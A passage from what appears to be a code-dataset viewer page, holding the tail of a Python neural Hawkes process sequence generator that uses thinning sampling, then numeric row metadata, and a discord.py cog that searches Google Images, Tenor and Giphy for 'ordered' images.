        # this part is time-invariant so
        # we do not need to take its hard_relu
        #self.hard_relu(
        #    numpy.dot(
        #        self.hidden_t, self.W_mu
        #    )
        #)
        #
        self.intensity_ub = self.soft_relu_scale(
            self.intensity_tilde_ub
        )
        # intensity computation is finished
    #
    #
    def sample_time_given_type(self, type_event):
        '''
        Sample the time of the next event of type `type_event` (the
        little k in the paper) via the thinning algorithm, starting
        from the most recent event.
        '''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        #self.compute_intensity(time_current)
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        # u starts above 1.0 so the rejection loop runs at least once
        u = 1.5
        while u >= 1.0:
            #print("type is : ", type_event)
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            #print("E U time_current : ")
            #print(E, U, time_current)
            #print("intensity hazard is : ")
            #print(intensity_hazard)
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / self.intensity[type_event]
            #print("new time_current and u : ")
            #print(time_current, u)
            #print("intensity and upper bound is : ")
            #print(self.intensity)
            #print(self.intensity_ub)
            # use adaptive thinning algorithm
            # that is, decreasing the upper bound
            # to make the sampling quicker
            # use adaptive method by
            # toggling on the following block
            '''
            self.compute_intensity_upper_bound(
                time_current
            )
            intensity_hazard = numpy.copy(
                self.intensity_ub[type_event]
            )
            '''
        return time_current
    #
    #
    #
    def gen_one_seq(self, max_len):
        '''
        Generate one sequence of `max_len` events into self.one_seq.
        '''
        self.restart_sequence()
        '''
        Liiniger (2009), p. 28, describes a "thinning algorithm":
        generate one event of each type, take the minimum,
        and discard the others.
        Details found in my paper write-up
        max_len is a pre-sampled value to set the length of seq
        '''
        # initialize the seq
        time_since_start = numpy.float32(0.0)
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        #
        for idx_event in range(max_len):
            time_of_happen = numpy.zeros(
                (self.dim_process,), dtype=dtype
            )
            # compute the hidden states
            # of the most recent event in sequence
            self.compute_hidden_states()
            #
            for type_event in range(self.dim_process):
                # sample one candidate per type ("thinning algorithm")
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(
                        type_event
                    )
                )
            # keep the earliest candidate, discard the rest
            time_since_start_new = numpy.min(time_of_happen)
            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            #
            # update sequence
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        #
        # throw away the BOS item
        # at the head of the sequence
        self.one_seq.pop(0)
    #
    #
    #
    def gen_seqs(self, settings):
        '''
        Generate settings['num_seqs'] sequences into self.list_seqs;
        each length is uniform over [min_len, max_len].
        '''
        #print(settings)
        print("generating sequences ... ")
        num_seqs = settings['num_seqs']
        #
        self.list_seqs = []
        cnt_seqs = 0
        #for idx_seq in range(num_seqs):
        while cnt_seqs < num_seqs:
            #
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            #
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            # periodic progress report
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
    #
    #
    def print_some(self):
        '''
        Pretty-print the first 10 generated sequences.
        '''
        # NOTE(review): the hard-coded range(10) raises IndexError if
        # fewer than 10 sequences were generated -- consider
        # range(min(10, len(self.list_seqs))).
        print("printing some seqs ... ")
        for idx_seq in range(10):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events = []
            list_time = []
            list_dtime = []
            list_items = []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
                list_dtime.append(
                    round(event_item['time_since_last_event'], 4)
                )
                list_items.append(
                    (
                        event_item['type_event'],
                        round(
                            event_item['time_since_last_event'], 4
                        )
                    )
                )
            print("the events, time and diff time for : ", idx_seq)
            print(list_events)
            print(list_time)
            print(list_dtime)
            print("the list of items is : ")
            print(list_items)
    #
    #
    def save_seqs(self, file_save):
        '''
        Pickle self.list_seqs to `file_save`.
        '''
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
    #
    #
| 33.405162
| 114
| 0.510137
| 16,004
| 141,070
| 4.231255
| 0.025931
| 0.038558
| 0.039901
| 0.024499
| 0.964514
| 0.959921
| 0.957824
| 0.953616
| 0.947797
| 0.943604
| 0
| 0.017706
| 0.397058
| 141,070
| 4,222
| 115
| 33.413074
| 0.778431
| 0.116219
| 0
| 0.780275
| 0
| 0
| 0.060876
| 0.014306
| 0
| 0
| 0
| 0.000474
| 0.002013
| 1
| 0.048306
| false
| 0
| 0.00369
| 0.007716
| 0.073801
| 0.04059
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4468581d70ebf3e6fb721882f185cef4082b1c84
| 7,213
|
py
|
Python
|
cogs/order.py
|
SilentSerenityy/JDBot
|
cd404000f06d51757439e435b2aaedbbab233144
|
[
"MIT"
] | null | null | null |
cogs/order.py
|
SilentSerenityy/JDBot
|
cd404000f06d51757439e435b2aaedbbab233144
|
[
"MIT"
] | null | null | null |
cogs/order.py
|
SilentSerenityy/JDBot
|
cd404000f06d51757439e435b2aaedbbab233144
|
[
"MIT"
] | null | null | null |
import os, discord, time, async_cse, random, TenGiphPy
from discord.ext import commands
from difflib import SequenceMatcher
from discord.ext.commands.cooldowns import BucketType
# Module-level API clients; the tokens are read from the environment at
# import time, so importing this cog fails fast if the env vars are unset.
tenor_client = TenGiphPy.Tenor(token=os.environ["tenor_key"])
giphy_client = TenGiphPy.Giphy(token=os.environ["giphy_token"])
class Order(commands.Cog):
    """Image-"ordering" commands backed by Google Image search, plus
    work-in-progress Tenor/Giphy commands."""

    def __init__(self, client):
        self.client = client

    async def _send_order_embed(self, ctx, args, emoji_image, time_before, time_after):
        # Shared tail of order / shuffle / order_shuffle (was duplicated
        # verbatim three times): delete the invoking message when
        # permitted, send the order "receipt" embed, and log a copy to
        # the audit channel.
        try:
            await ctx.message.delete()
        except discord.errors.Forbidden:
            pass
        embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
        embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
        embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
        embed.add_field(name="Powered by:",value="Google Images Api")
        embed.set_image(url=emoji_image.image_url)
        embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
        await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
        await self.client.get_channel(738912143679946783).send(embed=embed)

    @commands.cooldown(1,30,BucketType.user)
    @commands.group(name="order",invoke_without_command=True)
    async def order(self,ctx,*,args=None):
        """Search Google Images for *args* and deliver the closest match."""
        if args is None:
            await ctx.send("You can't order nothing.")
        if args:
            time_before=time.process_time()
            image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
            try:
                results = await image_client.search(args, safesearch=True, image_search=True)
                # pick the result whose URL is most similar to the query
                emoji_image = sorted(results, key=lambda x: SequenceMatcher(None, x.image_url,args).ratio())[-1]
            except async_cse.search.NoResults:
                await ctx.send("No results found :(")
                await image_client.close()
                return
            await image_client.close()
            time_after=time.process_time()
            await self._send_order_embed(ctx, args, emoji_image, time_before, time_after)

    @commands.cooldown(1,30,BucketType.user)
    @order.command(brief="a command to shuffle images from google images")
    async def shuffle(self,ctx,*,args=None):
        """Like `order`, but delivers a random result instead of the best match."""
        if args is None:
            await self.order(ctx,args="shuffle")
        if args:
            time_before=time.process_time()
            image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
            try:
                results = await image_client.search(args, safesearch=True, image_search=True)
            except async_cse.search.NoResults:
                await ctx.send("No results found :(")
                await image_client.close()
                return
            emoji_image = random.choice(results)
            await image_client.close()
            time_after=time.process_time()
            await self._send_order_embed(ctx, args, emoji_image, time_before, time_after)

    @commands.cooldown(1,30,BucketType.user)
    @commands.command(brief="a command to shuffle images from google images",aliases=["order-shuffle"])
    async def order_shuffle(self,ctx,*,args=None):
        """Top-level alias of `order shuffle`."""
        if args is None:
            await ctx.send("You can't order nothing")
        if args:
            time_before=time.process_time()
            image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
            try:
                results = await image_client.search(args, safesearch=True, image_search=True)
            except async_cse.search.NoResults:
                await ctx.send("No results found :(")
                await image_client.close()
                return
            emoji_image = random.choice(results)
            await image_client.close()
            time_after=time.process_time()
            await self._send_order_embed(ctx, args, emoji_image, time_before, time_after)

    @commands.cooldown(1,30,BucketType.user)
    @commands.group(name="tenor",invoke_without_command=True)
    async def tenor(self,ctx,*,args=None):
        """Search Tenor; the blocking client is run off the event loop."""
        if args:
            # run_in_executor needs a *callable*: the old code called
            # search() eagerly and passed its result, which blocked the
            # event loop and then raised TypeError inside the executor.
            results = await self.client.loop.run_in_executor(None, lambda: tenor_client.search(args, safesearch=True, limit=10))
            print(results)
            #going to be swapping to an async Tenorgiphy soon lol. This is true :D
        if args is None:
            await ctx.send("You can't search for nothing")

    @tenor.command(help="work in progress",name="shuffle")
    async def tenor_random(self,ctx,*,args=None):
        """Stub: random Tenor result (not implemented yet)."""
        if args:
            await ctx.send("WIP")
        if args is None:
            await ctx.send("That doesn't have any value.")
            await ctx.send("tenor shuffle")

    @commands.command(help="work in progress",aliases=["tenor-shuffle"])
    async def tenor_shuffle(self,ctx,*,args):
        """Stub: top-level alias of `tenor shuffle` (not implemented yet)."""
        if args:
            await ctx.send("WIP")
        if args is None:
            await ctx.send("That doesn't have any value.")
            await ctx.send("tenor shuffle")

    @commands.group(name="giphy",invoke_without_command=True)
    async def giphy(self,ctx,*,args=None):
        """Stub: Giphy search (not implemented yet)."""
        if args:
            await ctx.send("WIP")
        if args is None:
            await ctx.send("That doesn't have any value.")
            # was "tenor" -- copy-paste leftover from the tenor command
            await ctx.send("giphy")

    @giphy.command(help="work in progress",name="shuffle")
    async def giphy_random(self,ctx,*,args=None):
        """Stub: random Giphy result (not implemented yet)."""
        if args:
            await ctx.send("WIP")
        if args is None:
            await ctx.send("That doesn't have any value.")
            await ctx.send("giphy shuffle")

    @commands.command(help="work in progress",aliases=["giphy-shuffle"])
    async def giphy_shuffle(self,ctx,*,args):
        """Stub: top-level alias of `giphy shuffle` (not implemented yet)."""
        if args:
            await ctx.send("WIP")
        if args is None:
            await ctx.send("That doesn't have any value.")
            await ctx.send("giphy shuffle")

    async def cog_command_error(self,ctx,error):
        """Forward command errors to the channel unless the command has
        its own error handler."""
        if ctx.command and ctx.command.has_error_handler():
            pass
        else:
            await ctx.send(error)
def setup(client):
    """Entry point used by discord.py's extension loader: register the
    Order cog on the bot."""
    cog = Order(client)
    client.add_cog(cog)
| 43.451807
| 163
| 0.694579
| 1,053
| 7,213
| 4.644824
| 0.154796
| 0.045798
| 0.061337
| 0.022081
| 0.832141
| 0.826007
| 0.802085
| 0.802085
| 0.787365
| 0.757309
| 0
| 0.018157
| 0.175378
| 7,213
| 166
| 164
| 43.451807
| 0.804136
| 0.009566
| 0
| 0.719178
| 0
| 0
| 0.215985
| 0.008819
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0.027397
| 0.027397
| 0
| 0.068493
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.